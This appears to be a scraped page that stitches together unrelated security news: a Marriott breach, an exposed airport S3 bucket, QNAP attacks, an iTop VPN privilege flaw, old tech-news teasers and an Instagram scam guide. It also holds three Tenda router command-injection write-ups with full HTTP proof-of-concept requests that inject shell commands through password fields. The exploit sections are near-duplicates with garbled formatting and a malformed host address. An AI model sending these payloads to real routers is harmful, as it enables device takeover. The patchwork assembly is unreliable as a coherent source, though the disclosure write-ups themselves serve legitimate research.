The hospitality giant said data from 300-400 individuals was compromised by a social-engineering scam targeting the Baltimore airport.

Marriott International has acknowledged yet another data breach, this time impacting between 300 and 400 individuals.

Marriott told Dark Reading that it was a social-engineering scam that was able to trick a single hotel employee into turning over credentials for computer access. Now, the attackers want extortion money. The hotel chain added that it's preparing to notify people who were compromised.

DataBreaches.net was first to report on the latest Marriott compromise after the outlet said the threat actors contacted it to boast about the breach. The report said the Marriott attackers specifically targeted the Marriott at the BWI airport in Baltimore, Md., and were able to exfiltrate 20 GBs of data, including credit card details.

"The threat actor did not gain access to Marriott's core network," a Marriott spokesperson said in a statement to Dark Reading. "Our investigation determined that the information accessed primarily contained non-sensitive internal business files regarding the operation of the property."

The spokesperson added that the company was already aware of the incident and investigating before the attacker contacted Marriott with payment demands. Marriott refused to pay and is working with law enforcement, the person said.

According to the DataBreaches.net report, some of the information exposed included personal identifiable information (PII) for flight crews staying at BWI, including names, flight numbers and times, employment position, room number, and the credit card used for booking.

**Attack Follows Massive Marriott Breach in 2020**

This latest incident pales in comparison to the 2020 Marriott breach that exposed the PII of more than 5.2 million members of the hotel chain's loyalty program. But it illustrates how vulnerable organizations can be to follow-on attacks after an initial compromise, according to Jack Chapman, vice president of threat intelligence at Egress.

"As this latest data breach demonstrates, organizations that are victims of previous attacks are more likely to be targeted in the future," Chapman said in an email to Dark Reading. "Social engineering is a highly effective tool, and cybercriminals know that an organization's people are its biggest vulnerability — which is why they return to this technique again and again."

The results are undeniable: social engineering works.

"A primary mechanism being used by adversaries is social engineering," Saryu Nayyar, CEO and founder of Gurucul, explained via email. "It's simple and effective. And it means that initial compromise is dependent on human behaviors and is therefore impossible to prevent 100% of the time. All it takes is one successful compromise to circumvent most preventive controls."

Finding and securing the organization's most valuable data is a good first step to protecting against these increasingly common social engineering schemes, James McQuiggan, a security awareness advocate at KnowBe4, says.

"Too often, in data breaches, it is discovered that users have access to more data required to do their tasks effectively, and it is only found after the breach when it's on the Dark Web being copied around that the user did not need it," McQuiggan adds. "Any sensitive data, like names, emails, or other personnel data like HR reviews, are to be protected with multifactor authentication to increase the protection and reduce the risk of an attacker having easy access."

Marriott Data Breach Exposes PII, Credit Cards

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function setipv6status.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tengda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\*Firmware download address：\***_ https://www.tenda.com.cn/download/detail-3225.html

• \*\*\*\*Firmware download address：\*\*\*\*https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in setipv6status

##\* \* \* \\ \* description\*\*\*\*

###_**\* I. product information:\***_

Overview of the latest version of Tenda ax1803 router simulation:

\### _**\*2. Vulnerability details\***_

Tenda ax1803 is found to have a command injection vulnerability in the setipv6status function

When we set connect type = ' PPPoE ', we will get a command injection vulnerability after logging in.

\## _**\*3. Recurring vulnerabilities and POCS\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware through QEMU system or other methods (real machine)

Attack with the following POC attacks

Note to replace the password field in the cookie

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(ls > /tmp/xxx)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-34595: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

The unsecured server exposed more than 1.5 million files, including airport worker ID photos and other PII, highlighting the ongoing cloud-security challenges worldwide.

A misconfigured Amazon S3 bucket resulted in 3TB of airport data (more than 1.5 million files) being publicly accessible, open, and without an authentication requirement for access, highlighting the dangers of unsecured cloud infrastructure within the travel sector.

The exposed information, uncovered by Skyhigh Security, includes employee personal identification information (PII) and other sensitive company data affecting at least four airports in Colombia and Peru.

The PII ranged from photos of airline employees and national ID cards — which could present a serious threat if leveraged by terrorist groups or criminal organizations — to information about planes, fuel lines, and GPS map coordinates.

The bucket (now secured) contained information dating back to 2018, the report says, noting Android mobile apps also were contained within buckets, which security personnel tap to help with incident reporting and data handling.

"Airport security protects the lives of travelers and airport staff," the report explains. "As such, this breach is extremely dangerous with potentially devastating consequences should the bucket’s content end up in the wrong hands."  

As travel picks up dramatically following restrictions during the pandemic, Fortune Business Insights found that the global smart airport market size is set to be driven by the rising preference of the masses for air travel. The report also says that the expansion of commercial aviation is set to affect the market positively in the coming years, as airports increasingly turn to cloud service providers to house and process massive amounts of passenger and operational data.

Perhaps it's no wonder that travel-related organizations have been increasingly targeted of late. For instance, airlines have been the target of ransomware this year, including India's low-cost carrier SpiceJet, which weathered an attack in May that caused widespread flight delays. 

At the same time, multiple cybercrime groups have been spotted selling stolen credentials and other sensitive PII pilfered from travel-related websites and cloud databases, according to security firm Intel 471's tracking.

**Cloud Security Still Porous**

Back in 2019, Gartner stated that "90% of organizations that fail to control public cloud use will inappropriately share sensitive data." And that worry continues today: A recent IDC survey of CISOs in the US found that 80% of respondents are not able to identify excessive access to sensitive data in cloud production environments.

"Unfortunately, news headlines like these highlight examples of a data breach due to a simple, but harmful misconfiguration: an unsecured, exposed cloud storage service," according to Skyhigh's analysis. "Complexities around identity management, access permissions, secure configurations, data protection, and so much more, continuously result in poor cloud security hygiene and ultimately, data exposures."

And indeed, there has been no shortage of cloud security incidents recently — with misconfigurations leading the way. Cybercrime goals in subverting open databases can go beyond data pilfering, it should be noted, as shown by the recent discovery of Denonia, a Go-language-based cryptominer malware. It's designed to exploit AWS Lambda, the serverless function execution service.

Also, vulnerabilities in cloud products and services have become a growing concern for organizations, with a Linux container-escape flaw in Microsoft's Azure Service Fabric among the latest vulnerabilities disclosed.

The good news? One potential cloud security resource was recently established by security researchers at Wiz in the form of a community-based database — cloudvulndb.org — which currently lists some 70 cloud security issues and vulnerabilities.

**How to Protect Against Cloud Threats**

A recent survey of 500 security practitioners and 200 executives, conducted by cloud automation firm Lacework, indicated organizations must change the way they're securing cloud infrastructure and services.

Skyhigh’s report notes increasing read/write privileges are often the go-to for further strengthening cloud security. However, "in reality it will take far more than that; thanks to the extensive manners by which cloud storages can be accessed and misused," the report states.

So, other measures that the firm said should be implemented include: 

*   Enable automatic scanning for vulnerable storage across AWS S3 buckets and Azure Blobs.
*   Use continuous configuration audits for IaaS accounts and services to enforce consistent protection.
*   Enforce compliance checks against industry best practices to maintain secure postures.
*   Run data loss prevention and malware scans to detect violations in cloud-storage services and protect sensitive data from being exfiltrated.
*   Put measures in place to detect insider threats as well as threats from compromised accounts and privileged-access misuse.
*   And apply automatic remediation to take appropriate action against misconfigurations, vulnerabilities, and exposures.

Cloud Misconfig Exposes 3TB of Sensitive Airport Data in Amazon S3 Bucket: 'Lives at Stake'

Our roundtable of cybersecurity experts weighs in on what makes QNAP network-attached storage catnip for attackers, and what organizations can do about it.

QNAP has had a rough run of it lately on the cybersecurity front, with cybercrime groups continually targeting known vulnerabilities in its network-attached storage (NAS) devices and serious vulnerabilities coming to light several times already in 2022.

QNAP offerings and other NAS options provide centralized, shared file storage that can be accessed by multiple users and client devices on a local area network (LAN). They also offer a popular alternative to cloud backups and storage for smaller companies — and tend to house treasure troves of data.

According to Shodan, there are almost 300,000 QNAP devices directly connected to the Internet. And — to put it simply — attackers appreciate the large population.

Given this, attackers see NAS customers as a golden opportunity, according to a Dark Reading roundtable of security professionals, as evidenced by a bonanza of recent QNAP-related cyberattack activity.

**Unpatched QNAP Customers Face Ongoing Cyberattack Frenzy**

The multilevel-extortion threat known as the Deadbolt ransomware, in particular, is beating up on QNAP customers. Just last month, for example, the company flagged a new Deadbolt campaign going after its hardware — the second spate of such attacks in the past few weeks.

Other cybercrime groups are also taking aim at vulnerable devices: Earlier this year, QNAP was targeted by a wave of attacks using a new ransomware strain called eCh0raix.

Ransomware gangs are usually looking to exploit known bugs, such as critical flaws disclosed in April in Netatalk that affect QNAP and Synology firmware (CVE-2022-0194; CVE-2022-23122; CVE-2022-23125). These, which remain unpatched on certain NAS devices, allow remote code execution (RCE).

Another exploitable (but patched) flaw is a cross-site request forgery (CSRF) vulnerability (CVE-2021-34360) disclosed earlier this year in QNAP NAS devices running Proxy Server, which allows remote code injection.

It's worth noting that more sophisticated threats have options to pivot deeper into the network at patch-avoiding organizations as well: In March, the Taiwan-based QNAP said that its devices contained the severe Linux kernel vulnerability known as "Dirty Pipe," which is a privilege-escalation flaw that was deemed serious enough to warrant an alert from the US Cybersecurity and Infrastructure Security Agency (CISA). Of course, QNAP isn't alone in being vulnerable to that particular bug, but it contributes to the gear's attractiveness as a target.

In all, CISA has at least 10 QNAP vulnerabilities listed as being actively exploited by adversaries in its Known Exploited Vulnerability (KEV) Catalog.

Dark Reading spoke to a slate of security researchers about why QNAP devices are in the crosshairs of so much cyber-activity, and what companies can do about it.

**Why Is QNAP Getting Targeted?**

QNAP devices are attractive to cybercriminals for a number of reasons, including the fact that QNAP storage appliances are most often utilized by small to midsize (SMBs) businesses with very small (or non-existent) IT and security teams. This often translates to a lack of manpower for installing patches, among other downsides — creating large pools of devices that are ripe for exploitation.

"Storage devices that can be a core piece of an organization's operations that are easy to exploit create a perfect storm for ransomware gangs looking to ensure a quick payout to their extortion demands," says Chris Clements, vice president of solutions architecture at Cerberus Sentinel.

Also, the main mission attackers take on when exploiting vulnerabilities is, most often than not, data gathering. Historically, NAS products have been used by companies who prefer to take the route of an on-premises storage with a need for heavy use and storage capabilities, rather than a third-party handover of sensitive data, according to Brad Hong, customer success lead at Horizon3.ai.

"Since QNAP-branded NAS are quite literally a lateral extension of the organization's brain, even sometimes serving as the sole disaster-recovery storage, and make up about 54% of the NAS market share, it's only natural that its OS is a prime target for attackers," says Hong. "Imagine being able to circumvent all the strenuous steps of the cyber kill chain across every single enterprise, and instead using one key that fits more than half of the industry — effectively, it becomes a single vulnerability that negates all relevant cyber-stacks."

**NAS Appliances a Dangerous Attack Vector — But Patching Lags**

The risks to businesses from a successful compromise are myriad, researchers note, especially since by their very nature NAS appliances are often the primary data storage medium or are responsible for housing backups. Thus, successfully encrypting a storage appliance with ransomware can mean that the victim loses not only data, but also the source of backups and thus the ability to recover.

"The successful exploitation of a QNAP device, which often serves simultaneously as the heart and backbone of an organization, is akin to walking right into a HQ and swiping all its data," Horizon3.ai's Hong explains.

Roger Grimes, data-driven defense evangelist at KnowBe4, notes that a compromise not only means that the attacker has immediate access to data, but that the threat actor can use the initial exploitation to gain further access to the victim's logon credentials and broader network environment. Thus, he says, using security fundamentals should be a must-do.

"Basically, if defenders use strong log-on credentials, keep it patched, and follow the vendor's configuration recommendations, it can be as secure as any other cyber-product," he notes. "But according to CISA's KEV reporting, only three of the 10 reported exploited vulnerabilities have occurred since 2020. Most of the exploits are from things fixed by the vendor and patched years ago."

Cerberus Sentinel's Clements points out that appliances in general can also often lag significantly behind patching cadences of desktop or server systems, because most vendors lack a centralized mechanism for scheduling and deploying fixes for serious security flaws.

"Patches need to be manually applied by administrators," he says. "And patching storage appliances can also be disruptive not only because they require reboots, during which time important data can be inaccessible to a business, but often security patches are distributed by appliance vendors as part of larger firmware updates that can alter or even remove existing functionality that an organization may depend on."

But KnowBe4's Grimes notes that a simple administrative change could help the issue.

"Most of today's QNAP devices have an automatic patching feature, but it won't automatically apply the patch and reboot without the admin's consent," he explains. "Patching and rebooting takes time and causes operational interruption to the data on the device. So, they have to ask for approval. It would benefit QNAP and really every device in the world if the vendor was allowed to patch and reboot without permission."

QNAP customers would need to accept that patching is going to happen and expect small amounts of operational interruption during the patching process, he adds, pointing out that they could even control when the automatic patching happens.

**What is QNAP's Responsibility for Customer Security?**

While customers bear responsibility for their own patching, what about QNAP's rash of security bugs (and spotty track record in patching them quickly)?

"Of course, QNAP can help by doing better, more secure coding," Grimes says. "Many of the announced vulnerabilities have been because QNAP didn't do secure development lifecycle (SDL) coding and simple security reviews. Many of the flaws over the last few years are so basic that it just shows you that QNAP wasn't concentrating enough on making sure they had less vulnerable code."

Horizon3.ai's Hong highlighted the vendor’s own history of being slow to patch disclosed vulnerabilities.

"There's a larger conversation to be had here about legislation that should be passed to ensure vendors are doing their part to protect security, not just market share," he says. "One notorious example goes back in 2020 when an unauthenticated RCE and arbitrary file write exploit took more than seven months to be patched and, even then, only came after its four month disclosure grace-period expired and the exploit was finally made public."

Mike Parkin, senior technical engineer at Vulcan Cyber, has a different take, though.

"It's hard to say whether QNAP has just suffered a run of bad luck with exposed vulnerabilities or there is as actual issue keeping the systems secure, though I lean towards bad luck," he says. "Hopefully, updates from QNAP will make the devices more secure and the user community will take notice and review their own deployments to make sure they were done securely."

QNAP did not respond to a request for comment for this article.

**How Can Companies Protect Themselves Against QNAP Attacks?**

When it comes to best practices for defense, the basics are the place to start, researchers said, including regular patching as explained above. But other measures are important too, like keeping appliances off the Internet and using strong, unique log-on credentials.

"Generally, organizations should minimize their public attack surface," says Jake Williams, executive director of cyber-threat intelligence at Scythe. "Many vulnerabilities in networking gear and other appliances are only exploitable when the administrative interface is exposed to the Internet (something almost universally discouraged by device vendors)."

If they must be accessible via the Internet, appliances should be behind other security measures, according to Satnam Narang, senior staff research engineer at Tenable. "Ideally, you don't want to expose your NAS devices publicly, so keep them behind a router and a firewall and utilize (if available) built-in VPN functionality for remote access," he says.

Another issue that's fixable is the use of Universal Plug and Play (UPnP), which is a network protocol that allows devices to automatically set port-forwarding rules for themselves, meaning these devices are directly accessible from the Internet, sometimes without user knowledge.

"UPnP is used for a variety of purposes, including gaming and streaming content, with the protocol allowing convenience of quickly connecting devices to a network, but at a security cost," says Chris Morgan, senior cyber-threat intelligence analyst at Digital Shadows. "QNAP has clarified that in the wake of attacks targeting their NAS devices, UPnP should be disabled. Port forwarding, which also assists users in direct communication requests, should also be disabled."

Beyond the simple steps, researchers also note that technology approaches are also available, such as encryption for data.

"All organizations should invest in encrypting their sensitive data at rest, and preferably with unique encryption keys per file or object," says Scott Bledsoe, CEO at Theon Technology. "With granular encryption of data at rest, the compromise of a single encryption key will only result in a single item of information from being disclosed, and will prevent large-scale disclosure of sensitive information."

And finally, Ryan McCurdy, vice president of marketing at Bolster, explains that people-based or legacy approaches are nearly impossible to scale with the massive volume of data on the Web, all of which could be a conduit for an attack on NAS devices.

"Throwing bodies and point solutions at this problem no longer works," he says. "In order to scale, it's critical that companies take a platform approach and leverage automation to detect, analyze, and take down fraudulent sites and content across the Web, social media, app stores, marketplaces, and the Dark Web."

Roundtable: Amid Cyberattack Frenzy, How Can QNAP Customers Protect the Business?

The iTopVPNmini.exe component of iTop VPN 3.2 will try to connect to datastate_iTopVPN_Pipe_Server on a loop. An attacker that opened a named pipe with the same name can use it to gain the token of another user by listening for connections and abusing ImpersonateNamedPipeClient().

**Next Possible Facebook Development Focus- Voice-Based Browsing**

Facebook is still the leading social network on the planet. It is not resting on its laurels and be overtaken by the competition. It is actively seeking different ways to develop and improve its main product to continue leading the pack. One possible focus of development may possibly be voice-based browsing. If Facebook’s current actions \[…\]

Continue Reading...

**Yahoo Takes Top Spot Overtakes Google In US Traffic**

Struggling Web media company Yahoo has gone through many ups and downs during the previous years. One of the original brands still surviving since the early days of the World Wide Web, Yahoo has since fallen considerably from its top perch as one of the more popular websites that helped in making the Web what \[…\]

Continue Reading...

**Tablet Shipments Predicted To Outpace PCs by 2015**

Many experts have long predicted the gradual decline of desktop personal computers in terms of demand. The advances in mobile computing have greatly affected the market as an increasing number of people prefer using laptops, smartphones and tablets. As more and more choices for mobile devices become available, things are not boding well for the \[…\]

Continue Reading...

**Gartner Reports 102 Billion App Store Downloads for 2013**

The app market has become a very lucrative market now that smartphones have taken over. People now use their mobile phones for doing many things other than making phone calls. Thanks to apps, the smartphone has become a versatile product that further makes them more appealing. And because of this, app downloads have seen a \[…\]

Continue Reading...

**Toyota Announces Cars On Auto-Pilot In Five Years**

When you take out the new flashy designs and features of cars today, you will notice that nothing revolutionary have been introduced. What may be seen as innovative lately are the use of hybrid engines that combine gas and electric power to run cars and save up on fossil fuel. You can also add GPS \[…\]

Continue Reading...

**Intel Reports Solid 3rd Quarter Earnings But With Cautious 4th Quarter Outlook**

Computer chip maker Intel recently reported a solid third quarter with better than expected earnings. But outlook for the fourth quarter remains cautious as not all business groups within the company enjoyed earnings improvements. The company reported third quarter earnings of $ 3 billion from a revenue of $ 13.5 billion, just similar to the \[…\]

Continue Reading...

**BlackBerrys BBM App Gets 10 Million Downloads In A Day**

Beleaguered BlackBerrysmartphone maker Research In Motion may have found a way to stay afloat. The company has struggled in recent years due to tight competition from iOS and Android smartphones. Its latest BlackBerry Z10 smartphone had a lukewarm reception from consumers. Although the exact sales figures are not yet known, since the company has not \[…\]

Continue Reading...

**Smartphones Now Take Up 70 Percent Of Teen Market 79 Percent For Young Adults**

It seems that feature phones are now going the way of the pager, if it has not already yet. More and more people now think of mobile phones as more than just a device to use for calling or texting. The market is becoming saturated with smartphones that allow users to do more than just \[…\]

Continue Reading...

**Twitter Goes Public Now What**

The Twitter IPO has finally pushed through after months and months of speculation. The way it is going, analysts are saying that it is faring better than when social network Facebook’s IPO of last year. The social network experienced a sudden decline in its share price in the weeks following the IPO. It took about \[…\]

Continue Reading...

**Bitcoin Popularity A Currency Revolution**

Just a couple of years ago, most people in the financial sector may not have heard of Bitcoin, the digital currency that is currently becoming a rage. In a matter of months, this fledgling digital currency has received quite an amount of publicity that has driven its name at the forefront. Suddenly, this little-known digital \[…\]

Continue Reading...

**Recent Posts**

CVE-2022-24141: iTop- Technology News

July may positively disrupt and adrenalize the old-fashioned Dynamic Application Security Scanning (DAST) market, despite the coming holiday season. The pathbreaking innovation comes from ImmuniWeb, a global application security company, well known for, among other things, its free Community Edition that processes over 100,000 daily security scans of web and mobile apps. 
Today, ImmuniWeb

July may positively disrupt and adrenalize the old-fashioned Dynamic Application Security Scanning (DAST) market, despite the coming holiday season. The pathbreaking innovation comes from ImmuniWeb, a global application security company, well known for, among other things, its free Community Edition that processes over 100,000 daily security scans of web and mobile apps.

Today, ImmuniWeb announced that its new product – Neuron – is publicly available. This would be another boring press release by a software vendor, but the folks from ImmuniWeb managed to add a secret sauce that you will unlikely be able to resist tasting. The DAST scanning service is flexibly available as a SaaS, and unsurprisingly contains all fashionable features commonly advertised by competitors on the rapidly growing global market, spanning from native CI/CD integrations to advanced configuration of security scanning, pre-programmed or authenticated testing.

But the groundbreaking feature is Neuron's contractual zero false positives SLA, incorporated into every customer contract. You get your money back for each false positive you spot in your vulnerability scanning report – as simple as that – and binding by a legally enforceable contract. The SLA, however, does not cover trivial security warnings, such as misconfigurations of cookies or HTTP headers.

Likewise, contrasted to a casino, you cannot get rich with the SLA – the money-back provision is capped by your annual subscription price, making sense for everyone from a business perspective. The SLA is valid for web applications, cloud-native microservices, RESTful APIs and all other HTTP/HTTPS targets that you can scan in one click from the user-friendly Neuron dashboard:

Another of Neuron's game-changing features is the unlimited technical support available for all customers at no additional cost. If you have questions about detected vulnerabilities or your software engineers need some help with remediation of the findings, ImmuniWeb security analysts will be your Northern Star. Other security vendors commonly charge for this option separately as a costly consulting service, making their margins on it. This perk makes Neuron's value for money highly competitive amid the unfolding inflation and looming recession that will likely hit the cybersecurity industry too.

Talking about value, we particularly enjoyed Neuron's packaging and licensing model that brings some refreshing flexibility to the existing DAST market. Instead of being handcuffed to your target domains during your entire subscription, you may dynamically change them – without paying an extra dime – as long as your web application or API remains the same. This can be a budget-saving option for organizations that frequently move their targets between different environments prior to deploying their code into production. Of note, Neuron's integration with ImmuniWeb's Attack Surface Management (ASM) offering makes quite a lot of sense both for DevOps and compliance teams: you can first illuminate your shadow IT and forgotten web assets, and then enhance your web application security testing program with a holistic and risk-based testing schedule.

In its exclusive statement for The Hacker News, ImmuniWeb's Chief Architect said that Neuron is just one of the major announcements planned by the company for 2022. The Swiss-headquartered vendor has an ambitious roadmap to add even more products to its portfolio, which already covers over 20 uses cases spanning from cloud and mobile security testing to Dark Web Monitoring. Consolidating threat intelligence and Dark Web data with your application security testing – appears to be another smart idea by ImmuniWeb: it isn't worth to scan your website for XSS if you have hundreds of stolen credentials exposed on the Dark Web, allowing bad guys to login. We frankly like the synergizing power that ImmuniWeb Platform delivers to its customers in consumable and actionable manner.

We will keep an eye on ImmuniWeb's rising market traction. Following ImmuniWeb for several years, we believe that these folks can deliver what they promise. Anyway, Neuron is worth a try with a free demo.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

The End of False Positives for Web and API Security Scanning?

Fake sellers. Competitions. Crypto cons. There are plenty of grifts on the platform, but you don’t have to get sucked in.

Since Mark Zuckerberg snapped up Instagram for a mere $1 billion in April 2012, the app has grown into a social media juggernaut and one of Meta’s biggest assets. More than a billion people use Instagram every month, with influencers relying on it as a key source of their income.

Any online congregation of this size is naturally a target for hackers and scammers looking to take advantage of people and make a quick buck. As a result, Instagram is a frequent objective for scammers trying to take over your account and get you to send them money, as well as for shilling cryptocurrency scams.

“Instagram scams and account takeovers are a big problem,” says Jessica Barker, the co-CEO of cybersecurity company Cygenta, who says she has seen a recent uptick in reports of Instagram scammers. “Scams take place over all social media platforms, but Instagram’s popularity, open nature, and sense of personal connection make it an ideal platform for scammers to exploit.”

Still, it is possible to avoid the vast majority of Instagram scams with a little knowledge of what to be cautious of and some quick changes to your account settings.

How to Spot Scams on Instagram

Scammers move quickly. Whenever there’s a big event such as Russia’s war in Ukraine, the outbreak of Covid-19, or rapidly fluctuating cryptocurrency prices, the scams appear soon afterward. Online scams are constantly evolving, which means there are plenty of ways scammers may try to extort you. One startup is now even selling insurance against Instagram hacks.

“With Instagram being so popular, audiences can grow quickly, and often the number of followers can make people trust an account in no time,” says Jake Moore, global cybersecurity advisor at security firm ESET. “This is accelerated when known contacts already follow such accounts, and this trust can be a very forceful presence if required to make victims hand over details such as their credentials to a fake landing page to ‘sign in,’ for example.”

Instagram details the wide range of potential scams in a post on its website. These include loan and investment scams such as cryptocurrency scams, competitions and giveaway scams, job scams involving fake job ads, phishing scams to gain access to your account, and counterfeit products like fake iPhones and Apple Watches.

Scammers try to achieve a couple of things: They want you to send them money or get access to your Instagram account so it can be used in ongoing and future scams. These scams often work in similar ways as scammers try to trick you into either handing over personal information or money, or get you to click on links that can harvest your login details.

It’s likely that a lot of scam efforts on Instagram will be directed at you using direct messages. Scammers can send you messages or links to click on that lead to phishing websites. “A good way to recognize if you’re being manipulated is to look out for communications that are unexpected, make you feel something, and ask you to do something,” Barker says.

If an account slides into your DMs saying you’ve won a competition or that you should check out a way to make money quickly, or is offering some kind of promotional collaboration, then it's probably too good to be true. (You should delete the messages and report the scam.)

